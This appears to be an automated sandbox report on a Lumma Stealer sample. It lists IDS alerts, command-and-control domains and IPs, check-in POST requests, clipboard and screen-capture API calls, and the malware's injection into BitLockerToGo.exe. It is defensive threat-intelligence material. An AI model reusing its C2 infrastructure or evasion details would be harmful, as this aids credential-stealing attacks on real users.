Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov esi, edx	4_2_02FD3D40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4x nop then mov eax, dword ptr [esp+04h]	4_2_02FA9D20

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2055301 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (potentioallykeos .shop) : 192.168.2.5:52293 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055294 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI) : 192.168.2.5:49714 -> 104.21.84.50:443
Source: Network traffic	Suricata IDS: 2055299 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (interactiedovspm .shop) : 192.168.2.5:56479 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055300 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (interactiedovspm .shop in TLS SNI) : 192.168.2.5:49713 -> 172.67.161.217:443
Source: Network traffic	Suricata IDS: 2055364 - Severity 1 - ET MALWARE Lumma Stealer Domain in TLS SNI (drinnkysoapmzv .shop) : 192.168.2.5:49712 -> 172.67.174.127:443
Source: Network traffic	Suricata IDS: 2055361 - Severity 1 - ET MALWARE Lumma Stealer Domain in DNS Lookup (drinnkysoapmzv .shop) : 192.168.2.5:58033 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055293 - Severity 1 - ET MALWARE Lumma Stealer Related CnC Domain in DNS Lookup (charecteristicdxp .shop) : 192.168.2.5:49572 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2055294 - Severity 1 - ET MALWARE Observed Lumma Stealer Related Domain (charecteristicdxp .shop in TLS SNI) : 192.168.2.5:49715 -> 104.21.84.50:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49715 -> 104.21.84.50:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49712 -> 172.67.174.127:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49715 -> 104.21.84.50:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49712 -> 172.67.174.127:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49714 -> 104.21.84.50:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49714 -> 104.21.84.50:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49713 -> 172.67.161.217:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49713 -> 172.67.161.217:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: consciousourwi.shop
Source: Malware configuration extractor	URLs: drinnkysoapmzv.shop
Source: Malware configuration extractor	URLs: cagedwifedsozm.shop
Source: Malware configuration extractor	URLs: weiggheticulop.shop
Source: Malware configuration extractor	URLs: interactiedovspm.shop
Source: Malware configuration extractor	URLs: potentioallykeos.shop
Source: Malware configuration extractor	URLs: charecteristicdxp.shop
Source: Malware configuration extractor	URLs: southedhiscuso.shop
Source: Malware configuration extractor	URLs: deicedosmzj.shop

Source: Joe Sandbox View	IP Address: 172.67.161.217 172.67.161.217
Source: Joe Sandbox View	IP Address: 104.21.84.50 104.21.84.50

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drinnkysoapmzv.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: interactiedovspm.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: charecteristicdxp.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedCookie: __cf_mw_byp=Aiq6LY3fReQR5MfaD5shs0Qt6Wr7W4V4x_sb5i2pGE4-1725222298-0.0.1.1-/apiUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 48Host: charecteristicdxp.shop

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: drinnkysoapmzv.shop
Source: global traffic	DNS traffic detected: DNS query: potentioallykeos.shop
Source: global traffic	DNS traffic detected: DNS query: interactiedovspm.shop
Source: global traffic	DNS traffic detected: DNS query: charecteristicdxp.shop

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drinnkysoapmzv.shop

Source: BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://charecteristicdxp.shop/
Source: BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://charecteristicdxp.shop/C
Source: BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2658742837.000000000326D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2656023005.000000000326C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://charecteristicdxp.shop/api
Source: BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://charecteristicdxp.shop/apiz
Source: BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://charecteristicdxp.shop/h
Source: BitLockerToGo.exe, 00000004.00000003.2630757931.000000000326D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drinnkysoapmzv.shop/
Source: BitLockerToGo.exe, 00000004.00000002.2658639500.000000000323B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drinnkysoapmzv.shop/api
Source: BitLockerToGo.exe, 00000004.00000002.2658639500.000000000323B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drinnkysoapmzv.shop/p
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	String found in binary or memory: https://github.com/quic-go/quic-go/wiki/Logging11579208921035624876269744694940757353008614341529031
Source: BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://interactiedovspm.shop/
Source: BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://interactiedovspm.shop/T
Source: BitLockerToGo.exe, 00000004.00000002.2658742837.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630820171.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2655980514.000000000328B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potentioallykeos.shop/
Source: BitLockerToGo.exe, 00000004.00000003.2630820171.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potentioallykeos.shop/api
Source: BitLockerToGo.exe, 00000004.00000003.2630820171.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potentioallykeos.shop/api)
Source: BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potentioallykeos.shop/api9
Source: BitLockerToGo.exe, 00000004.00000003.2630820171.0000000003299000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2630757931.0000000003299000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://potentioallykeos.shop/h
Source: BitLockerToGo.exe, 00000004.00000003.2656060688.000000000324F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/5xx-error-landing
Source: BitLockerToGo.exe, 00000004.00000003.2656060688.000000000324F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/

Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712

Source: unknown	HTTPS traffic detected: 172.67.174.127:443 -> 192.168.2.5:49712 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.161.217:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.50:443 -> 192.168.2.5:49714 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.84.50:443 -> 192.168.2.5:49715 version: TLS 1.2

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_02FC8B80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_02FC8B80

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_02FC8B80 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

4_2_02FC8B80

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_02FC9443 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

4_2_02FC9443

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
Source: 00000000.00000002.2621055667.000000C000280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FAC28C	4_2_02FAC28C
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD2A34	4_2_02FD2A34
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FAA380	4_2_02FAA380
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FAAB40	4_2_02FAAB40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD21B0	4_2_02FD21B0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FCD120	4_2_02FCD120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD269E	4_2_02FD269E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FACC60	4_2_02FACC60
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD32F5	4_2_02FD32F5
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBDAF0	4_2_02FBDAF0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FC2AEA	4_2_02FC2AEA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FCDAC0	4_2_02FCDAC0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBB2A0	4_2_02FBB2A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FB4A9D	4_2_02FB4A9D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FCCA70	4_2_02FCCA70
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FC0A6F	4_2_02FC0A6F
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FB121A	4_2_02FB121A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA6A10	4_2_02FA6A10
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBC3E8	4_2_02FBC3E8
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FB43E7	4_2_02FB43E7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD5BD0	4_2_02FD5BD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA43C0	4_2_02FA43C0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FAFBA2	4_2_02FAFBA2
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FAE370	4_2_02FAE370
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FACB00	4_2_02FACB00
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FB20BA	4_2_02FB20BA
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FB60A0	4_2_02FB60A0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA9890	4_2_02FA9890
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD5880	4_2_02FD5880
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD3870	4_2_02FD3870
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA8050	4_2_02FA8050
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBD00A	4_2_02FBD00A
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD51F0	4_2_02FD51F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBE1E7	4_2_02FBE1E7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FCC1A7	4_2_02FCC1A7
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FB999E	4_2_02FB999E
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FB0185	4_2_02FB0185
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FAE93D	4_2_02FAE93D
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA3920	4_2_02FA3920
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD4120	4_2_02FD4120
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FAE110	4_2_02FAE110
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD16F0	4_2_02FD16F0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FB9EEE	4_2_02FB9EEE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD36E0	4_2_02FD36E0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBF662	4_2_02FBF662
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD3E40	4_2_02FD3E40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA1E30	4_2_02FA1E30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBEE18	4_2_02FBEE18
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA5770	4_2_02FA5770
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FCD750	4_2_02FCD750
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBFF44	4_2_02FBFF44
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FB24DE	4_2_02FB24DE
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FAC4D0	4_2_02FAC4D0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FCCCD0	4_2_02FCCCD0
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA6480	4_2_02FA6480
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD3C30	4_2_02FD3C30
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBD410	4_2_02FBD410
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FAB5AF	4_2_02FAB5AF
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FCDD90	4_2_02FCDD90
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FC258B	4_2_02FC258B
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA4D80	4_2_02FA4D80
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FBA574	4_2_02FBA574
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD3D40	4_2_02FD3D40
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FD5540	4_2_02FD5540
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 4_2_02FA9D20	4_2_02FA9D20

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 02FA9360 appears 76 times
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: String function: 02FA8A40 appears 43 times

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1440

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Static PE information: Number of sections : 12 > 10

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000534000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000002.2621834022.000000C000476000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe, 00000000.00000003.2606479076.000001FC6D590000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Source: 00000000.00000002.2621055667.000000C000346000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
Source: 00000000.00000002.2621055667.000000C000280000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research

Source: classification engine

Classification label: mal100.troj.evad.winEXE@4/0@4/3

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 4_2_02FC73A0 CoCreateInstance,

4_2_02FC73A0

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

File created: C:\Users\Public\Libraries\dmdcp.scif

Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Mutant created: \Sessions\1\BaseNamedObjects\donutfatshitlatte

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\d2712346-7ece-4761-b076-126ffccf67ef

Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

File opened: C:\Windows\system32\fa016e40584e3cd2cd8c0732909d2e74fdfa90a8e1a2991c24474f6ae0628f28AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	ReversingLabs: Detection: 60%
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Virustotal: Detection: 67%

Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	String found in binary or memory: net/addrselect.go
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	String found in binary or memory: github.com/saferwall/pe@v1.5.4/loadconfig.go
Source: SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	String found in binary or memory: LwNOrAxUVY/load.go

Source: unknown	Process created: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe"
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3032 -s 1440
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Jump to behavior

Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Win64.Malware-gen.24437.6720.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rasadhlp.dll	Jump to behavior
